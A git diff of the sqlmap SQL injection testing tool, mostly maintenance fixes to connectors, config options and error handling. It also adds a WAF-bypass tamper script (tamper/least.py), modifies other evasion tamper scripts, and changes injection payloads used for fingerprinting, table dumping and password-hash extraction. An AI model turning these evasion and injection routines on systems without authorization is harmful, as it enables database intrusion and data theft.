self.error_code = code
|
||||
self.error_message = message
|
||||
@@ -64,6 +64,8 @@ class SQLAlchemy(GenericConnector):
|
||||
raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__)
|
||||
except ImportError:
|
||||
pass
|
||||
elif "invalid literal for int() with base 10: '0b" in traceback.format_exc():
|
||||
raise SqlmapConnectionException("SQLAlchemy connection issue ('https://bitbucket.org/zzzeek/sqlalchemy/issues/3975')")
|
||||
raise
|
||||
except SqlmapFilePathException:
|
||||
raise
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import pyodbc
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import ibm_db_dbi
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import kinterbasdb
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import jaydebeapi
|
||||
import jpype
|
||||
except ImportError, msg:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import ibm_db_dbi
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -226,12 +226,10 @@ class Enumeration(GenericEnumeration):
|
||||
|
||||
return {}
|
||||
|
||||
def searchDb(self):
|
||||
warnMsg = "on SAP MaxDB it is not possible to search databases"
|
||||
def search(self):
|
||||
warnMsg = "on SAP MaxDB search option is not available"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getHostname(self):
|
||||
warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import _mssql
|
||||
import pymssql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -46,7 +46,7 @@ class Filesystem(GenericFilesystem):
|
||||
scrString = ""
|
||||
|
||||
for lineChar in fileContent[fileLine:fileLine + lineLen]:
|
||||
strLineChar = hexencode(lineChar)
|
||||
strLineChar = hexencode(lineChar, conf.encoding)
|
||||
|
||||
if not scrString:
|
||||
scrString = "e %x %s" % (lineAddr, strLineChar)
|
||||
|
||||
@@ -82,7 +82,7 @@ class Fingerprint(GenericFingerprint):
|
||||
if conf.direct:
|
||||
result = True
|
||||
else:
|
||||
result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])")
|
||||
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.MSSQL
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import pymysql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
@@ -37,8 +37,10 @@ class Connector(GenericConnector):
|
||||
|
||||
try:
|
||||
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
|
||||
except (pymysql.OperationalError, pymysql.InternalError, struct.error), msg:
|
||||
except (pymysql.OperationalError, pymysql.InternalError), msg:
|
||||
raise SqlmapConnectionException(msg[1])
|
||||
except struct.error, msg:
|
||||
raise SqlmapConnectionException(msg)
|
||||
|
||||
self.initCursor()
|
||||
self.printConnected()
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import cx_Oracle
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -67,7 +67,7 @@ class Enumeration(GenericEnumeration):
|
||||
user = None
|
||||
roles = set()
|
||||
|
||||
for count in xrange(0, len(value)):
|
||||
for count in xrange(0, len(value or [])):
|
||||
# The first column is always the username
|
||||
if count == 0:
|
||||
user = value[count]
|
||||
|
||||
@@ -10,7 +10,7 @@ try:
|
||||
import psycopg2.extensions
|
||||
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
|
||||
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
from lib.core.data import logger
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import sqlite3
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import _mssql
|
||||
import pymssql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -11,7 +11,6 @@ from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
from lib.core.exception import SqlmapUndefinedMethod
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
class Connector:
|
||||
"""
|
||||
@@ -23,8 +22,8 @@ class Connector:
|
||||
self.cursor = None
|
||||
|
||||
def initConnection(self):
|
||||
self.user = conf.dbmsUser.encode(UNICODE_ENCODING) if conf.dbmsUser is not None else ""
|
||||
self.password = conf.dbmsPass.encode(UNICODE_ENCODING) if conf.dbmsPass is not None else ""
|
||||
self.user = conf.dbmsUser or ""
|
||||
self.password = conf.dbmsPass or ""
|
||||
self.hostname = conf.hostname
|
||||
self.port = conf.port
|
||||
self.db = conf.dbmsDb
|
||||
|
||||
@@ -534,7 +534,7 @@ class Databases:
|
||||
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
|
||||
query = rootQuery.inband.query % tbl
|
||||
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
|
||||
if dumpMode and colList:
|
||||
values = [(_,) for _ in colList]
|
||||
@@ -564,7 +564,7 @@ class Databases:
|
||||
index, values = 1, []
|
||||
|
||||
while True:
|
||||
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
||||
query = rootQuery.inband.query2 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)
|
||||
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||
|
||||
if isNoneValue(value) or value == " ":
|
||||
@@ -663,15 +663,15 @@ class Databases:
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.count % (tbl)
|
||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = rootQuery.blind.query % tbl
|
||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
parseSqliteTableSchema(value)
|
||||
return kb.data.cachedColumns
|
||||
@@ -694,7 +694,7 @@ class Databases:
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
count, index, values = 0, 1, []
|
||||
while True:
|
||||
query = rootQuery.blind.query3 % (conf.db, tbl, index)
|
||||
query = rootQuery.blind.query3 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)
|
||||
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
if isNoneValue(value) or value == " ":
|
||||
break
|
||||
@@ -723,11 +723,11 @@ class Databases:
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
field = condition.replace("[DB]", conf.db)
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query % (tbl)
|
||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
field = None
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
|
||||
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
field = condition
|
||||
|
||||
@@ -761,9 +761,9 @@ class Databases:
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
||||
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query2 % (tbl, column)
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column)
|
||||
|
||||
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
|
||||
|
||||
@@ -170,18 +170,44 @@ class Entries:
|
||||
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
query = rootQuery.blind.count % table
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
if isNumPosStrValue(count):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
for index in indexRange:
|
||||
row = []
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
value = inject.getValue(query, blind=False, time=False, dump=True) or ""
|
||||
row.append(value)
|
||||
|
||||
entries.append(row)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
|
||||
@@ -191,7 +217,7 @@ class Entries:
|
||||
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if not entries and query:
|
||||
if not entries and query and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
entries = inject.getValue(query, blind=False, time=False, dump=True)
|
||||
except KeyboardInterrupt:
|
||||
@@ -285,17 +311,44 @@ class Entries:
|
||||
elif Backend.isDbms(DBMS.MAXDB):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
for index in indexRange:
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
value = inject.getValue(query, union=False, error=False, dump=True) or ""
|
||||
|
||||
if column not in lengths:
|
||||
lengths[column] = 0
|
||||
|
||||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
|
||||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
|
||||
else:
|
||||
emptyColumns = []
|
||||
|
||||
@@ -235,7 +235,7 @@ class Users:
|
||||
|
||||
if retVal:
|
||||
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])):
|
||||
password = "0x%s" % hexencode(password).upper()
|
||||
password = "0x%s" % hexencode(password, conf.encoding).upper()
|
||||
|
||||
if user not in kb.data.cachedUsersPasswords:
|
||||
kb.data.cachedUsersPasswords[user] = [password]
|
||||
@@ -393,7 +393,7 @@ class Users:
|
||||
user = None
|
||||
privileges = set()
|
||||
|
||||
for count in xrange(0, len(value)):
|
||||
for count in xrange(0, len(value or [])):
|
||||
# The first column is always the username
|
||||
if count == 0:
|
||||
user = value[count]
|
||||
@@ -424,7 +424,8 @@ class Users:
|
||||
|
||||
# In Firebird we get one letter for each privilege
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
|
||||
if privilege.strip() in FIREBIRD_PRIVS:
|
||||
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
|
||||
|
||||
# In DB2 we get Y or G if the privilege is
|
||||
# True, N otherwise
|
||||
|
||||
13
sqlmap.conf
13
sqlmap.conf
@@ -98,9 +98,9 @@ authCred =
|
||||
# Syntax: key_file
|
||||
authFile =
|
||||
|
||||
# Ignore HTTP Error 401 (Unauthorized).
|
||||
# Valid: True or False
|
||||
ignore401 = False
|
||||
# Ignore HTTP error code (e.g. 401).
|
||||
# Valid: integer
|
||||
ignoreCode =
|
||||
|
||||
# Ignore system default proxy settings.
|
||||
# Valid: True or False
|
||||
@@ -671,8 +671,8 @@ batch = False
|
||||
# Result fields having binary values (e.g. "digest").
|
||||
binaryFields =
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
charset =
|
||||
# Check Internet connection before assessing the target.
|
||||
checkInternet = False
|
||||
|
||||
# Crawl the website starting from the target URL.
|
||||
# Valid: integer
|
||||
@@ -690,6 +690,9 @@ csvDel = ,
|
||||
# Valid: CSV, HTML or SQLITE
|
||||
dumpFormat = CSV
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
encoding =
|
||||
|
||||
# Retrieve each query output length and calculate the estimated time of
|
||||
# arrival in real time.
|
||||
# Valid: True or False
|
||||
|
||||
23
sqlmap.py
23
sqlmap.py
@@ -9,12 +9,16 @@ import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
|
||||
try:
|
||||
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
|
||||
except ImportError:
|
||||
exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
|
||||
|
||||
import bdb
|
||||
import distutils
|
||||
import glob
|
||||
import inspect
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
@@ -40,6 +44,7 @@ try:
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import maskSensitiveData
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.common import weAreFrozen
|
||||
from lib.core.data import cmdLineOptions
|
||||
@@ -214,7 +219,7 @@ def main():
|
||||
dataToStdout(excMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "tamper/" in excMsg:
|
||||
elif any(_ in excMsg for _ in ("tamper/", "waf/")):
|
||||
logger.critical(errMsg)
|
||||
print
|
||||
dataToStdout(excMsg)
|
||||
@@ -260,6 +265,13 @@ def main():
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):
|
||||
errMsg = "there has been a problem in enumeration. "
|
||||
errMsg += "Because of a considerable chance of false-positive case "
|
||||
errMsg += "you are advised to rerun with switch '--flush-session'"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("pymysql", "configparser")):
|
||||
errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
|
||||
logger.error(errMsg)
|
||||
@@ -275,6 +287,9 @@ def main():
|
||||
elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in excMsg for _ in ("Broken pipe",)):
|
||||
raise SystemExit
|
||||
|
||||
for match in re.finditer(r'File "(.+?)", line', excMsg):
|
||||
file_ = match.group(1)
|
||||
file_ = os.path.relpath(file_, os.path.dirname(__file__))
|
||||
@@ -320,6 +335,10 @@ def main():
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
if conf.get("harFile"):
|
||||
with openFile(conf.harFile, "w+b") as f:
|
||||
json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))
|
||||
|
||||
if cmdLineOptions.get("sqlmapShell"):
|
||||
cmdLineOptions.clear()
|
||||
conf.clear()
|
||||
|
||||
15
sqlmapapi.py
15
sqlmapapi.py
@@ -5,14 +5,19 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import logging
|
||||
import optparse
|
||||
import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
|
||||
|
||||
import logging
|
||||
import optparse
|
||||
import warnings
|
||||
|
||||
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
|
||||
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
|
||||
|
||||
from sqlmap import modulePath
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.data import logger
|
||||
@@ -40,13 +45,15 @@ def main():
|
||||
apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store")
|
||||
apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store")
|
||||
apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store")
|
||||
apiparser.add_option("--username", help="Basic authentication username (optional)", action="store")
|
||||
apiparser.add_option("--password", help="Basic authentication password (optional)", action="store")
|
||||
(args, _) = apiparser.parse_args()
|
||||
|
||||
# Start the client or the server
|
||||
if args.server is True:
|
||||
server(args.host, args.port, adapter=args.adapter)
|
||||
server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password)
|
||||
elif args.client is True:
|
||||
client(args.host, args.port)
|
||||
client(args.host, args.port, username=args.username, password=args.password)
|
||||
else:
|
||||
apiparser.print_help()
|
||||
|
||||
|
||||
@@ -36,10 +36,10 @@ def tamper(payload, **kwargs):
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
|
||||
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
|
||||
|
||||
if match:
|
||||
_ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
|
||||
_ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
|
||||
retVal = retVal.replace(match.group(0), _)
|
||||
|
||||
return retVal
|
||||
|
||||
45
tamper/least.py
Normal file
45
tamper/least.py
Normal file
@@ -0,0 +1,45 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.HIGHEST
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces greater than operator ('>') with 'LEAST' counterpart
|
||||
|
||||
Tested against:
|
||||
* MySQL 4, 5.0 and 5.5
|
||||
* Oracle 10g
|
||||
* PostgreSQL 8.3, 8.4, 9.0
|
||||
|
||||
Notes:
|
||||
* Useful to bypass weak and bespoke web application firewalls that
|
||||
filter the greater than character
|
||||
* The LEAST clause is a widespread SQL command. Hence, this
|
||||
tamper script should work against majority of databases
|
||||
|
||||
>>> tamper('1 AND A > B')
|
||||
'1 AND LEAST(A,B+1)=B+1'
|
||||
"""
|
||||
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
|
||||
|
||||
if match:
|
||||
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
|
||||
retVal = retVal.replace(match.group(0), _)
|
||||
|
||||
return retVal
|
||||
@@ -33,7 +33,7 @@ def tamper(payload, **kwargs):
|
||||
|
||||
>>> random.seed(0)
|
||||
>>> tamper('SELECT id FROM users')
|
||||
'SELECT%0Bid%0DFROM%0Cusers'
|
||||
'SELECT%A0id%0BFROM%0Cusers'
|
||||
"""
|
||||
|
||||
# ASCII table:
|
||||
@@ -42,7 +42,8 @@ def tamper(payload, **kwargs):
|
||||
# FF 0C new page
|
||||
# CR 0D carriage return
|
||||
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
|
||||
blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
|
||||
# A0 non-breaking space
|
||||
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
|
||||
127
txt/checksum.md5
127
txt/checksum.md5
@@ -21,35 +21,35 @@ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.
|
||||
310efc965c862cfbd7b0da5150a5ad36 extra/sqlharvest/__init__.py
|
||||
7713aa366c983cdf1f3dbaa7383ea9e1 extra/sqlharvest/sqlharvest.py
|
||||
7afe836fd97271ccba67b4c0da2482ff lib/controller/action.py
|
||||
95fda7f284e0a882634cf5e94cbb73e1 lib/controller/checks.py
|
||||
df647d57cf02cc0e4bda6b8ccc9d8138 lib/controller/controller.py
|
||||
52a3969f57170e935e3fc0156335bf2c lib/controller/handler.py
|
||||
b220153f82deefa5d5f513f1ebf2346b lib/controller/checks.py
|
||||
a66093c734c7f94ecdf94d882c2d8b89 lib/controller/controller.py
|
||||
926bdaf98d082a41fdd57bb41c1692d1 lib/controller/handler.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/controller/__init__.py
|
||||
60599fbb43b7d5e658b84371d3ad0b42 lib/core/agent.py
|
||||
90b4f40ccde13c44e26f53db474afc19 lib/core/agent.py
|
||||
6cc95a117fbd34ef31b9aa25520f0e31 lib/core/bigarray.py
|
||||
6c8507976da31524e7afa3886d13bf4f lib/core/common.py
|
||||
5065a4242a8cccf72f91e22e1007ae63 lib/core/convert.py
|
||||
ff068a628d68a4dcf597ae60e6e8abe2 lib/core/common.py
|
||||
9edefb92b0b9cad862543fcd587aaa66 lib/core/convert.py
|
||||
a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py
|
||||
7936d78b1a7f1f008ff92bf2f88574ba lib/core/datatype.py
|
||||
36c85e9ef109c5b4af3ca9bb1065ef1f lib/core/decorators.py
|
||||
94b06df2dfd9f6c7a2ad3f04a846b686 lib/core/defaults.py
|
||||
7309cf449b009723d1a4655fcf1a96d7 lib/core/dicts.py
|
||||
fa0cc2588d9e3fe215d4519879a0678f lib/core/dicts.py
|
||||
65b9187de3d8c9c28ddab53ef2b399bc lib/core/dump.py
|
||||
b9ff4e622c416116bee6024c0f050349 lib/core/enums.py
|
||||
9381a0c7e8bc19986299e84f4edda1a0 lib/core/exception.py
|
||||
4e7538d2700947749e0ef93819f4b13b lib/core/enums.py
|
||||
a44d7a4cc6c9a67a72d6af2f25f4ddac lib/core/exception.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/core/__init__.py
|
||||
9ba39bf66e9ecd469446bdbbeda906c3 lib/core/log.py
|
||||
ebb778c2d26eba8b34d7d8658e4105a6 lib/core/optiondict.py
|
||||
97231fc3987ffce83f59a7aa545ef4c9 lib/core/option.py
|
||||
e8e9fd4f224ead0caa1569312b5b2582 lib/core/optiondict.py
|
||||
1b22c491f07c838eb470624ee4320d12 lib/core/option.py
|
||||
5f2f56e6c5f274408df61943f1e080c0 lib/core/profiling.py
|
||||
40be71cd774662a7b420caeb7051e7d5 lib/core/readlineng.py
|
||||
d8e9250f3775119df07e9070eddccd16 lib/core/replication.py
|
||||
785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py
|
||||
40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py
|
||||
6a82bb3548afc52b7cecfcc81273c52e lib/core/settings.py
|
||||
d5d19c38c07e9ef926caa778b75571d6 lib/core/settings.py
|
||||
d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py
|
||||
2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py
|
||||
155e2d3fda87b2e3ffa4f7a770513946 lib/core/target.py
|
||||
effc153067a00bd43461bfc1cdec1122 lib/core/target.py
|
||||
8970b88627902239d695280b1160e16c lib/core/testing.py
|
||||
40881e63d516d8304fc19971049cded0 lib/core/threads.py
|
||||
ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
@@ -57,52 +57,53 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
4d13ed693401a498b6d073a2a494bd83 lib/core/wordlist.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/__init__.py
|
||||
8c4b04062db2245d9e190b413985202a lib/parse/banner.py
|
||||
aa89ea0c7c44eb74eaaeeccaddc94d39 lib/parse/cmdline.py
|
||||
850041c049ae5a8f4a318680e1ef812d lib/parse/cmdline.py
|
||||
3a31657bc38f277d0016ff6d50bde61f lib/parse/configfile.py
|
||||
14539f1be714d4f1ed042067d63bc50a lib/parse/handler.py
|
||||
64e5bb3ecbdd75144500588b437ba8da lib/parse/headers.py
|
||||
8da3684e70bfeef80b1d221ff0cd958c lib/parse/headers.py
|
||||
165dc27660c8559318009d44354f27cb lib/parse/html.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/parse/__init__.py
|
||||
0b010b7cdb2e42b5aa0caa59607279ad lib/parse/payloads.py
|
||||
997d0452e6fc22411f81a334511bcb3d lib/parse/sitemap.py
|
||||
403d873f1d2fd0c7f73d83f104e41850 lib/request/basicauthhandler.py
|
||||
aa8abda6eab79646b1759c0653925328 lib/request/basic.py
|
||||
0c476bde96ad035b3f0dde3b845e5e6e lib/request/basic.py
|
||||
ef48de622b0a6b4a71df64b0d2785ef8 lib/request/comparison.py
|
||||
95363c8973208dd95295a23acc9674bc lib/request/connect.py
|
||||
